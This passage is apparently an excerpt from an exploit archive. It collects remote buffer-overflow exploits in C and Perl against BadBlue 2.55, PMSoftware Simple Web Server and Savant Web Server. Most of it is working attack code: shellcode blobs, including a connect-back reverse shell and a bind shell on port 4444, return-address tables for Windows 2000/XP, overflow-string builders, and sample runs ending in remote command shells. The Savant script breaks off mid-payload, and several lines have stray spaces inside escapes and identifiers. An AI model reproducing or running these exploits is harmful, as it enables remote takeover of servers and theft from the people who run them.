"\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60\x48\x88\x88\x88\x 01\xCE\x6A\x77"
"\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60\x38\x88\x88\x88\x 01\xCE\x5E\xBB"
"\x77\x09\x64\x7C\x89\x88\x88\xDC\xE0\x89\x89\x88\x 88\x77\xDE\x7C"
"\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8\x77\xDE\x78\x03\x 50\xDF\xDF\xE0"
"\x8A\x88\xAF\x87\x03\x44\xE2\x9E\xD9\xDB\x77\xDE\x 64\xDF\xDB\x77"
"\xDE\x60\xBB\x77\xDF\xD9\xDB\x77\xDE\x6A\x03\x58\x 01\xCE\x36\xE0"
"\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B\x4C\x24\x05\xB4\x AC\xBB\x48\xBB"
"\x41\x08\x49\x9D\x23\x6A\x75\x4E\xCC\xAC\x98\xCC\x 76\xCC\xAC\xB5"
"\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4\x01\xDC\xAC\xD8\x 05\xCC\xAC\x98"
"\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1\xD9\xD9\x77\xFE\x 4A\xD9\x77\xDE"
"\x46\x03\x44\xE2\x77\x77\xB9\x77\xDE\x5A\x03\x40\x 77\xFE\x36\x77"
"\xDE\x5E\x63\x16\x77\xDE\x9C\xDE\xEC\x29\xB8\x88\x 88\x88\x03\xC8"
"\x84\x03\xF8\x94\x25\x03\xC8\x80\xD6\x4A\x8C\x88\x DB\xDD\xDE\xDF"
"\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D\xF0\x8B\x 5D\x03\xC2\x90"
"\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1\x03\xBC\x03\x8B\x 7D\xBB\x77\x74"
"\xBB\x48\x24\xB2\x4C\xFC\x8F\x49\x47\x85\x8B\x70\x 63\x7A\xB3\xF4"
"\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B\x55\xEE\x03\x84\x C3\x03\xD2\x94"
"\x8B\x55\x03\x8C\x03\x8B\x4D\x63\x8A\xBB\x48\x03\x 5D\xD7\xD6\xD5"
"\xD3\x4A\x8C\x88";
struct TARGETS {
int num;
char name[58];
char offset[5];
} targets[]= {
// char offset[]="\x56\x66\x46\x78"; // ntdll.dll V. 5.0.2195.6899 Windows 2k Spanish (CALL EBX)
// char offset[]="\x37\x25\x01\x10"; // ext.dll V. 1.0.0.1 (CALL EBX) Windows 2k SP4 Spanish
// char offset[]="\x3E\xFA\x02\x10"; // ext.dll V. 1.0.0.1 (FF55 0C CALL [EBP+C]) Windows XP SP1 Spanish
{ 0, "WinXP Professional SP1 (ext.dll)", "\x3E\xFA\x02\x10" }, // CALL [EBP+C]
{ 1, "Win2k Professional SP3/SP4 & Server SP4 (ext.dll)", "\x37\x25\x01\x10" }, // CALL EBX
//{ 2, "Crash", 0x41414141 }, // crash
};
char jmp[]="\xEB\x07"; // JMP $+9 (EB 07) To jump the offset
char jmpback[]="\xE9\x0D\xFE\xFF\xFF"; // JMP $-494 (E9 0DFEFFFF) To jump to the beginning of the shellcode
int CheckHeader(SOCKET s,struct sockaddr_in sa) { // Server: BadBlue/2.5
timeval tiempo;
fd_set fdset;
int leido; // Bytes leidos en el recv
char buffer[1024]; // Buffer de lectura con el recv
char version[11];
int retorno=0;
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0, 0))==INVALID_SOCKET){
printf("\n [e] Error: socket():%d\n", WSAGetLastError());
return(1);
}
if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
printf("\n [e] Error: connect()");
return(1);
}
send(s,GETHEADER,strlen(GETHEADER),0);
tiempo.tv_sec=TIMEOUT; // TimeOut del Select
tiempo.tv_usec=0;
FD_ZERO( &fdset ); // Inicializa FDSet a NULL
FD_SET( s, &fdset ); // Añade el descriptor AcceptedSocket a FDSet
if ((select( s + 1 , &fdset , NULL , NULL , &tiempo )) >0) {
if (FD_ISSET(s,(fd_set FAR *)&fdset)) { // True si ConnectSocket esta en FDSet
memset(&buffer, 0, sizeof(buffer));
if ((leido=recv( s,buffer,sizeof(buffer),0 )) > 0) {
if (leido > 42) {
strncpy(version,buffer+32,strlen(VALIDSERVER));
printf("\n [i] Server : %s",version);
if (strncmp(version,VALIDSERVER,strlen(VALIDSERVER))! =0) retorno=1;
}
else retorno=1;
}
else {
printf("\n [e] Server : Unknown");
retorno=1;
}
}
}
closesocket(s);
return(retorno);
}
void main(int argc, char *argv[]) {
SOCKET s;
WSADATA HWSAdata;
struct sockaddr_in sa;
char *buffer=NULL;
UINT i;
printf("\n Badblue 2.55 Web Server - Remote buffer overflow");
printf("\n Tarako AT Haxorcitos.com\n");
if ( (argc!=4) || (atoi(argv[3])>=sizeof(targets) / sizeof(struct TARGETS))) {
printf("\n OS:",argv[0]);
for (i=0;i<(sizeof(targets) / sizeof(struct TARGETS));i++) {
printf("\n %i - %s",i,targets[i].name);
}
printf("\n\n Usage: %s <IP> <Port> <OS> \n",argv[0]);
exit(1);
}
if (WSAStartup(MAKEWORD(2,2), &HWSAdata) != 0) {
printf("\n [e] Error: WSAStartup():%d\n", WSAGetLastError());
exit(1);
}
if ((s=WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,0,0, 0))==INVALID_SOCKET){
printf("\n [e] Error: socket():%d\n", WSAGetLastError());
exit(1);
}
sa.sin_family = AF_INET;
sa.sin_port = (USHORT)htons(atoi(argv[2]));
sa.sin_addr.S_un.S_addr = inet_addr(argv[1]);
printf("\n [i] Retrieving HTTP Server Header");
if (CheckHeader(s,sa)==1) {
printf("\n [i] Aborting exploit\n\n");
exit(1);
}
if ( connect(s, (struct sockaddr *) &sa, sizeof(sa)) == SOCKET_ERROR ) {
printf("\n [e] Error: connect()");
exit(1);
}
printf("\n [i] Connected : Yes");
printf("\n [i] Target : %s ",targets[atoi(argv[3])].name);
buffer=(char*)malloc(sizeof(char)*(strlen(HTTPSEND 1)+strlen(HTTPSEND2)+strlen(HTTPSEND3)+strlen(argv[1])+LEN+1));
memset(buffer,0,strlen(HTTPSEND1)+strlen(HTTPSEND2 )+strlen(HTTPSEND3)+strlen(argv[1])+LEN+1);
memcpy(buffer,HTTPSEND1,strlen(HTTPSEND1));
for( i=strlen(HTTPSEND1);i<(LEN+strlen(HTTPSEND1));i++) buffer[i]=(BYTE)0x90;
memcpy(buffer+strlen(HTTPSEND1),shellcode,strlen(s hellcode));
memcpy(buffer+strlen(HTTPSEND1)+485,jmp,strlen(jmp ));
memcpy(buffer+strlen(HTTPSEND1)+489,targets[atoi(argv[3])].offset,strlen(targets[atoi(argv[3])].offset));
memcpy(buffer+strlen(HTTPSEND1)+494,jmpback,strlen (jmpback));
memcpy(buffer+strlen(HTTPSEND1)+LEN,HTTPSEND2,strl en(HTTPSEND2));
memcpy(buffer+strlen(HTTPSEND1)+LEN+strlen(HTTPSEN D2),argv[1],strlen(argv[1]));
memcpy(buffer+strlen(HTTPSEND1)+LEN+strlen(HTTPSEN D2)+strlen(argv[1]),HTTPSEND3,strlen(HTTPSEND3));
send(s,buffer,strlen(buffer),0);
closesocket(s);
printf("\n [i] Work : Complete");
printf("\n [i] Now : telnet %s 9999\n",argv[1]);
}
// [2005-02-27]
80 PMSoftware Simple Web Server (GET Request) Remote BoF Exploit
/*
*
* PMSoftware Simple Web Server Buffer Overflow Exploit
* 3 targets
*
* cybertronic[at]gmx[dot]net
* 04/25/2005
* __ __ _
* _______ __/ /_ ___ _____/ /__________ ____ (_)____
* / ___/ / / / __ \/ _ \/ ___/ __/ ___/ __ \/ __ \/ / ___/
* / /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__
* \___/\__, /_.___/\___/_/ \__/_/ \____/_/ /_/_/\___/
* /____/
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* Usage: ./PMSoftwareSimpleWebServer_expl -h <tip> -p <tport> -l <cbip> -c <cbport> -t <target>
* 0 WinXP Home SP1 GER [0x71a17bfb] [pad=213] [offset=222]
* 1 WinXP Prof SP1 GER [0x71a17bfb] [pad=216] [offset=225]
* 2 WinXP Prof SP2 GER [0x71a19372] [pad=215] [offset=224]
*
* [ cybertronic @ PM ] $ ./PMSoftwareSimpleWebServer_expl -h 192.168.2.103 -p 80 -l 192.168.2.102 -c 1337 -t 1
*
* --[ exploit by : cybertronic - cybertronic[at]gmx[dot]net
* --[ connecting to 192.168.2.103:80...done!
* --[ exploiting WinXP Pro SP1 GER
* --[ ret: 0x71a17bfb [ jmp esp in ws2_32.dll ]
* --[ sending GET request [ 543 bytes ]...done!
* --[ starting reverse handler [port: 1337]...done!
* --[ incomming connection from: 192.168.2.103
* --[ b0x pwned - h4ve phun
* Microsoft Windows XP [Version 5.1.2600]
* (C) Copyright 1985-2001 Microsoft Corp.
*
* C:\PMSoftware>
*
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <unistd.h>
#define PORT 80
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
/*
*
* prototypes
*
*/
int connect_to_remote_host ( char* tip, unsigned short tport );
int exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, int targ );
int shell ( int s, char* tip, unsigned short cbport );
void header ();
void start_reverse_handler ( unsigned short cbport );
void usage ( char* name );
/*********************
* Windows Shellcode *
*********************/
/*
* Type : connect back shellcode
* Length: 316 bytes
* CBIP : reverseshell[111] ( ^ 0x99999999 )
* CBPort: reverseshell[118] ( ^ 0x9999 )
*
*/
unsigned char reverseshell[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x 0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\x C6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x 91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x 99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x 1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x 99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x 12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\x C8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\x A9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x 89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\x BD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\x EF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x 66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x 4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x 96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x 86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x 9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x 17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x 52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
/*
*
* structures
*
*/
typedef struct _args {
char* tip;
char* lip;
int tport;
int lport;
int target;
} args;
struct targets {
int num;
char name[64];
unsigned long ret;
int padding;
int offset;
}
target[]= {
{ 0, "WinXP Home SP1 GER", 0x71a17bfb, 213, 222 },
{ 1, "WinXP Prof SP1 GER", 0x71a17bfb, 216, 225 },
{ 2, "WinXP Prof SP2 GER", 0x71a19372, 215, 224 } //works only in conjunction with SoftIce :: stack guard is disabled somehow
};
/*
*
* functions
*
*/
int
connect_to_remote_host ( char* tip, unsigned short tport )
{
int s;
struct sockaddr_in remote_addr;
struct hostent *host_addr;
memset ( &remote_addr, 0x0, sizeof ( remote_addr ) );
if ( ( host_addr = gethostbyname ( tip ) ) == NULL )
{
printf ( "cannot resolve \"%s\"\n", tip );
exit ( 1 );
}
remote_addr.sin_family = AF_INET;
remote_addr.sin_port = htons ( tport );
remote_addr.sin_addr = * ( ( struct in_addr * ) host_addr->h_addr );
if ( ( s = socket ( AF_INET, SOCK_STREAM, 0 ) ) < 0 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
printf ( "--[ connecting to %s:%u...", tip, tport );
if ( connect ( s, ( struct sockaddr * ) &remote_addr, sizeof ( struct sockaddr ) ) == -1 )
{
printf ( "failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
return ( s );
}
int
exploit ( int s, unsigned long xoredip, unsigned short xoredcbport, int targ )
{
char in[2048], request[1024];
printf ( "--[ exploiting WinXP Pro SP1 GER\n" );
printf ( "--[ ret: 0x%08x [ jmp esp in ws2_32.dll ]\n", target[targ].ret );
memcpy ( &reverseshell[111], &xoredip, 4);
memcpy ( &reverseshell[118], &xoredcbport, 2);
bzero ( &request, sizeof ( request ) );
request[0] = 0x47;
request[1] = 0x45;
request[2] = 0x54;
request[3] = 0x20;
request[4] = 0x2f;
memset ( request + 5, 0x41, target[targ].padding );
strncat ( request, ( unsigned char* ) &target[targ].ret, 4 );
memcpy ( request + target[targ].offset, reverseshell, sizeof ( reverseshell ) - 1 );
strcat ( request, "\r\n" );
printf ( "--[ sending GET request [ %d bytes ]...", strlen ( request ) );
if ( write ( s, request, strlen ( request ) ) <= 0 )
{
printf ( "failed!\n" );
return ( 1 );
}
printf ( "done!\n" );
return ( 0 );
}
int
send_head ( int s )
{
}
int
shell ( int s, char* tip, unsigned short cbport )
{
int n;
char buffer[2048];
fd_set fd_read;
printf ( "--[" YELLOW " b" NORMAL "0" YELLOW "x " NORMAL "p" YELLOW "w" NORMAL "n" YELLOW "e" NORMAL "d " YELLOW "- " NORMAL "h" YELLOW "4" NORMAL "v" YELLOW "e " NORMAL "p" YELLOW "h" NORMAL "u" YELLOW "n" NORMAL "\n" );
FD_ZERO ( &fd_read );
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
while ( 1 )
{
FD_SET ( s, &fd_read );
FD_SET ( 0, &fd_read );
if ( select ( s + 1, &fd_read, NULL, NULL, NULL ) < 0 )
break;
if ( FD_ISSET ( s, &fd_read ) )
{
if ( ( n = recv ( s, buffer, sizeof ( buffer ), 0 ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( write ( 1, buffer, n ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
if ( FD_ISSET ( 0, &fd_read ) )
{
if ( ( n = read ( 0, buffer, sizeof ( buffer ) ) ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
if ( send ( s, buffer, n, 0 ) < 0 )
{
printf ( "bye bye...\n" );
return;
}
}
usleep(10);
}
}
void
header ()
{
printf ( " __ __ _ \n" );
printf ( " _______ __/ /_ ___ _____/ /__________ ____ (_)____ \n" );
printf ( " / ___/ / / / __ \\/ _ \\/ ___/ __/ ___/ __ \\/ __ \\/ / ___/ \n" );
printf ( "/ /__/ /_/ / /_/ / __/ / / /_/ / / /_/ / / / / / /__ \n" );
printf ( "\\___/\\__, /_.___/\\___/_/ \\__/_/ \\____/_/ /_/_/\\___/ \n" );
printf ( " /____/ \n\n" );
printf ( "--[ exploit by : cybertronic - cybertronic[at]gmx[dot]net\n" );
}
void
parse_arguments ( int argc, char* argv[], args* argp )
{
int i = 0;
while ( ( i = getopt ( argc, argv, "h:p:l:c:t:" ) ) != -1 )
{
switch ( i )
{
case 'h':
argp->tip = optarg;
break;
case 'p':
argp->tport = atoi ( optarg );
break;
case 'l':
argp->lip = optarg;
break;
case 'c':
argp->lport = atoi ( optarg );
break;
case 't':
argp->target = strtoul ( optarg, NULL, 16 );
break;
case ':':
case '?':
default:
usage ( argv[0] );
}
}
if ( argp->tip == NULL || argp->tport < 1 || argp->tport > 65535 || argp->lip == NULL || argp->lport < 1 || argp->lport > 65535 || argp->target < 0 || argp->target > 2 )
usage ( argv[0] );
}
void
start_reverse_handler ( unsigned short cbport )
{
int s1, s2;
struct sockaddr_in cliaddr, servaddr;
socklen_t clilen = sizeof ( cliaddr );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( cbport );
printf ( "--[ starting reverse handler [port: %u]...", cbport );
if ( ( s1 = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( "socket failed!\n" );
exit ( 1 );
}
bind ( s1, ( struct sockaddr * ) &servaddr, sizeof ( servaddr ) );
if ( listen ( s1, 1 ) == -1 )
{
printf ( "listen failed!\n" );
exit ( 1 );
}
printf ( "done!\n" );
if ( ( s2 = accept ( s1, ( struct sockaddr * ) &cliaddr, &clilen ) ) < 0 )
{
printf ( "accept failed!\n" );
exit ( 1 );
}
close ( s1 );
printf ( "--[ incomming connection from:\t%s\n", inet_ntoa ( cliaddr.sin_addr ) );
shell ( s2, ( char* ) inet_ntoa ( cliaddr.sin_addr ), cbport );
close ( s2 );
}
void
usage ( char* name )
{
int i;
printf ( "Usage: %s -h <tip> -p <tport> -l <cbip> -c <lport> -t <target>\n", name );
for ( i = 0; i < 3; i++ )
printf ( "\t%d %s [0x%08x] [pad=%d] [offset=%d]\n", target[i].num, target[i].name, target[i].ret, target[i].padding, target[i].offset );
exit ( 1 );
}
int
main ( int argc, char* argv[] )
{
int s, targ, i;
unsigned long xoredip;
unsigned short cbport, xoredcbport;
struct sockaddr_in remote_addr;
struct hostent *host_addr;
args myargs;
system ( "clear" );
header ();
parse_arguments ( argc, argv, &myargs );
s = connect_to_remote_host ( myargs.tip, myargs.tport );
xoredip = inet_addr ( myargs.lip ) ^ ( unsigned long ) 0x99999999;
xoredcbport = htons ( myargs.lport ) ^ ( unsigned short ) 0x9999;
if ( exploit ( s, xoredip, xoredcbport, myargs.target ) == 1 )
{
printf ( "exploitation FAILED!\n" );
exit ( 1 );
}
start_reverse_handler ( myargs.lport );
}
// [2005-04-24]
80 PMsoftware Simple Web Server 1.0 Remote Stack Overflow Exploit
/*
PMsoftware mini http server remote stack overflow exploit
author : c0d3r "kaveh razavi" [email protected] [email protected]
package : PMsoftware Web Server version 1.0
advisory : http://www.securiteam.com/windowsntfocus/5TP0B2KFGA.html
company address : www.pmx.it
timeline :
17 Feb 2005 : bug found by ERNW Security
18 Apr 2005 : Public Disclosure
18 Apr 2005 : crash exploit released (ERNW Security)
20 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
compiled with visual c++ 6 : cl pm.c
greetz : IHSTeam members,exploit-dev mates, securiteam , str0ke-milw0rm
ihsteam.com (persian) www.ihssecurity.com (english , just started)
a big F*u to those who were/are/will trading konkoor questions-answers
(c) IHS security 2005
/*
/*
D:\projects>pm.exe 127.0.0.1 80 0
-------- PMSoftware web server remote overflow exploit by c0d3r
[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 680 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully try telnet 127.0.0.1 4444
D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\PMSoftware>DONE !
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 680
// 5 byte GET + 241 byte NOP junk + 4 byte containing return address
// + 30 byte NOP + 399 byte shellcode
// using metasploit great shellcode LPORT=4444 Size=399
unsigned char shellcode[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x5e\x81\x 73\x17\x4f\x85"
"\x2f\x98\x83\xeb\xfc\xe2\xf4\xb3\x6d\x79\x98\x4f\x 85\x7c\xcd\x19"
"\xd2\xa4\xf4\x6b\x9d\xa4\xdd\x73\x0e\x7b\x9d\x37\x 84\xc5\x13\x05"
"\x9d\xa4\xc2\x6f\x84\xc4\x7b\x7d\xcc\xa4\xac\xc4\x 84\xc1\xa9\xb0"
"\x79\x1e\x58\xe3\xbd\xcf\xec\x48\x44\xe0\x95\x4e\x 42\xc4\x6a\x74"
"\xf9\x0b\x8c\x3a\x64\xa4\xc2\x6b\x84\xc4\xfe\xc4\x 89\x64\x13\x15"
"\x99\x2e\x73\xc4\x81\xa4\x99\xa7\x6e\x2d\xa9\x8f\x da\x71\xc5\x14"
"\x47\x27\x98\x11\xef\x1f\xc1\x2b\x0e\x36\x13\x14\x 89\xa4\xc3\x53"
"\x0e\x34\x13\x14\x8d\x7c\xf0\xc1\xcb\x21\x74\xb0\x 53\xa6\x5f\xce"
"\x69\x2f\x99\x4f\x85\x78\xce\x1c\x0c\xca\x70\x68\x 85\x2f\x98\xdf"
"\x84\x2f\x98\xf9\x9c\x37\x7f\xeb\x9c\x5f\x71\xaa\x cc\xa9\xd1\xeb"
"\x9f\x5f\x5f\xeb\x28\x01\x71\x96\x8c\xda\x35\x84\x 68\xd3\xa3\x18"
"\xd6\x1d\xc7\x7c\xb7\x2f\xc3\xc2\xce\x0f\xc9\xb0\x 52\xa6\x47\xc6"
"\x46\xa2\xed\x5b\xef\x28\xc1\x1e\xd6\xd0\xac\xc0\x 7a\x7a\x9c\x16"
"\x0c\x2b\x16\xad\x77\x04\xbf\x1b\x7a\x18\x67\x1a\x b5\x1e\x58\x1f"
"\xd5\x7f\xc8\x0f\xd5\x6f\xc8\xb0\xd0\x03\x11\x88\x b4\xf4\xcb\x1c"
"\xed\x2d\x98\x5e\xd9\xa6\x78\x25\x95\x7f\xcf\xb0\x d0\x0b\xcb\x18"
"\x7a\x7a\xb0\x1c\xd1\x78\x67\x1a\xa5\xa6\x5f\x27\x c6\x62\xdc\x4f"
"\x0c\xcc\x1f\xb5\xb4\xef\x15\x33\xa1\x83\xf2\x5a\x dc\xdc\x33\xc8"
"\x7f\xac\x74\x1b\x43\x6b\xbc\x5f\xc1\x49\x5f\x0b\x a1\x13\x99\x4e"
"\x0c\x53\xbc\x07\x0c\x53\xbc\x03\x0c\x53\xbc\x1f\x 08\x6b\xbc\x5f"
"\xd1\x7f\xc9\x1e\xd4\x6e\xc9\x06\xd4\x7e\xcb\x1e\x 7a\x5a\x98\x27"
"\xf7\xd1\x2b\x59\x7a\x7a\x9c\xb0\x55\xa6\x7e\xb0\x f0\x2f\xf0\xe2"
"\x5c\x2a\x56\xb0\xd0\x2b\x11\x8c\xef\xd0\x67\x79\x 7a\xfc\x67\x3a"
"\x85\x47\x68\xc5\x81\x70\x67\x1a\x81\x1e\x43\x1c\x 7a\xff\x98";
unsigned int rc,sock,os,addr ;
struct sockaddr_in tcp;
struct hostent *hp;
WSADATA wsaData;
char buffer[size];
char jmp_esp[5];
unsigned short port;
char GET[] = "\x47\x45\x54\x20\x2F";
char winxpsp1[] = "\xCC\x59\xFB\x77";
char winxpsp2[] = "\xED\x1E\x94\x7C"; // not tested
int main (int argc, char *argv[]){
if(argc < 3) {
printf("\n-------- PMSoftware web server remote overflow exploit by c0d3r\n");
printf("-------- usage : pm.exe host port target\n");
printf("-------- target 1 : windows xp service pack 1 : 0\n");
printf("-------- target 2 : windows xp service pack 1 : 1\n");
printf("-------- eg : pm.exe 127.0.0.1 80 0\n\n");
exit(-1) ;
}
printf("\n-------- PMSoftware web server remote overflow exploit by c0d3r\n\n");
os = (unsigned short)atoi(argv[3]);
switch(os)
{
case 0:
strcat(jmp_esp,winxpsp1);
break;
case 1:
strcat(jmp_esp,winxpsp2); // wasnt checked
break;
default:
printf("\n[-] this target doesnt exist in the list\n\n");
exit(-1);
}
// Creating heart of exploit code
printf("[+] building overflow string");
memset(buffer,NOP,size);
memcpy(buffer,GET,sizeof(GET)-1);
memcpy(buffer+246,jmp_esp,sizeof(jmp_esp)-1);
memcpy(buffer+275,shellcode,sizeof(shellcode)-1);
buffer[size] = 0;
// EO heart of exploit code
if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
printf("[-] WSAStartup failed !\n");
exit(-1);
}
hp = gethostbyname(argv[1]);
if (!hp){
addr = inet_addr(argv[1]);
}
if ((!hp) && (addr == INADDR_NONE) ){
printf("[-] unable to resolve %s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if (!sock){
printf("[-] socket() error...\n");
exit(-1);
}
if (hp != NULL)
memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
else
tcp.sin_addr.s_addr = addr;
if (hp)
tcp.sin_family = hp->h_addrtype;
else
tcp.sin_family = AF_INET;
port=atoi(argv[2]);
tcp.sin_port=htons(port);
printf("\n[+] attacking host %s\n" , argv[1]) ;
Sleep(1000);
printf("[+] packet size = %d byte\n" , sizeof(buffer));
rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
if(rc==0)
{
Sleep(1000) ;
printf("[+] connected\n") ;
printf("[+] sending the overflow string\n") ;
send(sock,buffer,strlen(buffer),0);
printf("[+] exploit sent successfully try telnet %s 4444\n" , argv[1]);
}
else {
printf("[-] ouch! Server is not listening .... \n");
}
shutdown(sock,1);
closesocket(sock);
}
// EO exploit code
// [2005-04-20]
80 Savant Web Server 3.1 Remote Buffer Overflow Exploit
#!/usr/local/bin/perl
#
# Savant Buffer Overflow Exploit
# ----------------------------------
# Infam0us Gr0up - Securiti Research
#
#
# Tested on Windows2000 SP4 (Win NT)
# Info: infamous.2hell.com
# Vendor URL: http://savant.sourceforge.net
#
$ARGC=@ARGV;
if ($ARGC !=3) {
print "\nUsage: $0 [remote IP] [Port]\n";
print "Example: $0 127.0.0.1 80 1\n";
print "\nsystem:\n";
print " 1 - Windows 2000 SP4\n";
print " 2 - winXP sp1\n";
print "\n";
exit;
}
use Socket;
$x90 = "\x90"x13;
$pack_ret = pack('l', ($ret));
if($sistem==1){$ret = 0x77e14c29;} # Windows 2000 SP4
if($sistem==2){$ret = 0x77fb59cc;} # winXP sp1
my($remote,$port,$iaddr,$paddr,$proto);
$remote=$ARGV[0];
$port =$ARGV[1];
$sistem = $ARGV[2];
print "\n";
print "[+] Connect to $remote..\n";
$iaddr = inet_aton($remote) or die "[-] Error: $!";
$paddr = sockaddr_in($port, $iaddr) or die "[-] Error: $!";
$proto = getprotobyname('tcp') or die "[-] Error: $!";
socket(SOCK, PF_INET, SOCK_STREAM, $proto) or die "[-] Error: $!";
connect(SOCK, $paddr) or die "[-] Error: $!";
print "[+] Connected\n";
print "[+] Build shellcode..\n";
my $shellcode =
"\x2b\xc9\x83\xe9\xb8\xd9\xee\xd9\x74\x24\xf4\x5b\x 81\x73\x13\x94".
"\xd3\x48\xef\x83\xeb\xfc\xe2\xf4\x68\xb9\xa3\xa2\x 7c\x2a\xb7\x10".
"\x6b\xb3\xc3\x83\xb0\xf7\xc3\xaa\xa8\x58\x34\xea\x ec\xd2\xa7\x64".
"\xdb\xcb\xc3\xb0\xb4\xd2\xa3\xa6\x1f\xe7\xc3\xee\x 7a\xe2\x88\x76".
"\x38\x57\x88\x9b\x93\x12\x82\xe2\x95\x11\xa3\x1b\x af\x87\x6c\xc7".
"\xe1\x36\xc3\xb0\xb0\xd2\xa3\x89\x1f\xdf\x03\x64\x cb\xcf\x49\x04".
"\x97\xff\xc3\x66\xf8\xf7\x54\x8e\x57\xe2\x93\x8b\x 1f\x90\x78\x64".
"\xd4\xdf\xc3\x9f\x88\x7e\xc3\xaf\x9c\x8d\x20\x61\x da\xdd\xa4\xbf".
"\x6b\x05\x2e\xbc\xf2\xbb\x7b\xdd\xfc\xa4\x3b\xdd\x cb\x87\xb7\x3f".
"\xfc\x18\xa5\x13\xaf\x83\xb7\x39\xcb\x5a\xad\x89\x 15\x3e\x40\xed".
"\xc1\xb9\x4a\x10\x44\xbb\x91\xe6\x61\x7e\x1f\x10\x 42\x80\x1b\xbc".
"\xc7\x90\x1b\xac\xc7\x2c\x98\x87\xeb\xd3\x48\xee\x f2\xbb\x4f\x53".
"\xf2\x80\xc1\x0e\x01\xbb\xa4\x16\x3e\xb3\x1f\x10\x 42\xb9\x58\xbe".
"\xc1\x2c\x98\x89\xfe\xb7\x2e\x87\xf7\xbe\x22\xbf\x cd\xfa\x84\x66".
"\x73\xb9\x0c\x66\x76\xe2\x88\x1c\x3e\x46\xc1\x12\x 6a\x91\x65\x11";
# If Savant can serve HTTP requests with a server socket to receive the requests,
# the Savant server will keep online when this error occurs.
# Most often, this can by try to simultaneously run two web servers.
# Also this could Allows attacker to bind a port
$sploit =
"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x 24\x24\x8b\x45".
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x 20\x01\xeb\x49".
